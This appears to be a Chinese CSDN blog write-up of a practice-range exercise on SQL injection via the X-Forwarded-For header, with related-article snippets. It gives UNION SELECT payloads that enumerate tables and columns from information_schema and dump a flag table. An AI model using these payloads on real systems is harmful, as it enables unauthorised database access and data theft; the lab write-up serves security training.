墨者学院HTTP头注入漏洞测试(X-Forwarded-for)

最新推荐文章于 2024-04-15 00:43:03 发布
最新推荐文章于 2024-04-15 00:43:03 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: 注入 文章标签: 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43817824/article/details/97136723
版权

打开靶场环境,查看网页源代码,发现flag.php是进入墨者的任性首页。

设置网页代理,进入墨者的任性网页,打开Burp Suite ,抓包,右键发送给repeater,自己填入X-Forwarded-For,然后判断是否可注入。


3.order by 判断表数量,最后发现是4
4.union select 1,2,3,4测试其注入点的位置是在4,通过union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())可知表名为comment,flag,goods,user。000.png
5.通过union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name='flag')可知列名为id,flag。
6.最后通过union select 1,2,3,(select group_concat(flag) from flag)可得flag的数值.

7.取消代理,填入到flag处获取key。

睡不醒的少年
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
墨者学院之靶场(http请求注入
DMXA的博客
10-07 111
【代码】墨者学院之靶场(http请求注入
墨者 - X-Forwarded-For注入漏洞实战
吃肉唐僧的博客
07-10 3909
X-Forwarded-For 刷题之前先知道这个是什么东西,X-Forwarded-For 是一个 HTTP 扩展部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入RFC 7239(Forwarded...
渗透测试-XFF漏洞攻击原理及防御方案
最新发布
lza20001103的博客
04-15 1470
渗透测试-XFF漏洞攻击原理及防御方案
墨者学院-HTTP注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1511
一、审题 这题从题目,也可以看放包后的回显可以知道是http的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添加XFF ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
抓包理解X-Forwarded-For和proxy_add_x_forwarded_for
Default
05-24 6213
目录 1.nginx.conf设置指令 2.发送请求,无请求域X-Forwarded-For 3.发送请求,有请求域X-Forwarded-For 4.理解 1.nginx.conf设置指令 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 2.发送请求,无请求域X-Forw...
Radware负载均衡-X-Forwarded-For
2301_76601027的博客
04-28 782
Radware负载均衡-X-Forwarded-For;当在数据流从客户端 流向服务器的过程中被拦截的情况下,服务端的访问日志只能记录负载均衡器的IP地址,如果想要获取最初发起请求客户端地址的话,那么X-Forwarded-For就派上了用场。那么在Radware负载均衡器上是怎么操作的,在服务器端显示的结果又是什么样的,那开始今天的X-Forwarded-For功能演示。VS下插入X-Forwarded-For在服务器上抓包查看含带X-Forwarded-For字段
墨者学院-HTTP注入漏洞测试(X-Forwarded-for)
JimWu的博客
09-04 494
HTTP注入漏洞测试(X-Forwarded-for) 难易程度:★★ 题目类型:WEB安全 使用工具:FireFox浏览器、burpsuite 1.打开靶场,根据题目是http注入,打开burpsuite,点击链接,截取包。 2.send to repeater,在下方加一行X-Forwarded-For,开始注入。 3.输入1=1,go一下,返回正常页面。 4.输入union selec...
HTTP注入漏洞测试(X-Forwarded-for)
cc_de_csdn的博客
08-25 760
1.使用BrupSuite捕获flag.php页面的报文并发送到Repeater 2.发现报文中并没有X-Forwarded-for条目,自己添加 3.在X-Forwarded-for条目后面使用mysql注入语句测试注入 1.判断字段:使用order by,测试出有四个字段 2.使用union select 1,2,3,4 查看回显的位置 3.判断表名union select 1,2,3,(se...
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 2165
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7528
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求,以及remote_add
墨者学院-在线靶场-HTTP注入漏洞测试(X-Forwarded-for) Writeup
s0mor
08-09 796
首先题目提示 XFF注入,大致思路为Burp抓包添加XFF请求进行注入。 启动靶场 点击进入墨者的任性网页 Burpsuite抓包,放进Repeater 先GO一下 在请求中添加X-Forwarded-For 试了试 '、and 1=1 、 and 1=2都没反应 当改为or 1=1时,提示语法错误 继续,union注入步骤 order by 5提示未知字段5,order by 4返...
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6257
墨者学院-X-Forwarded-For注入漏洞实战
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值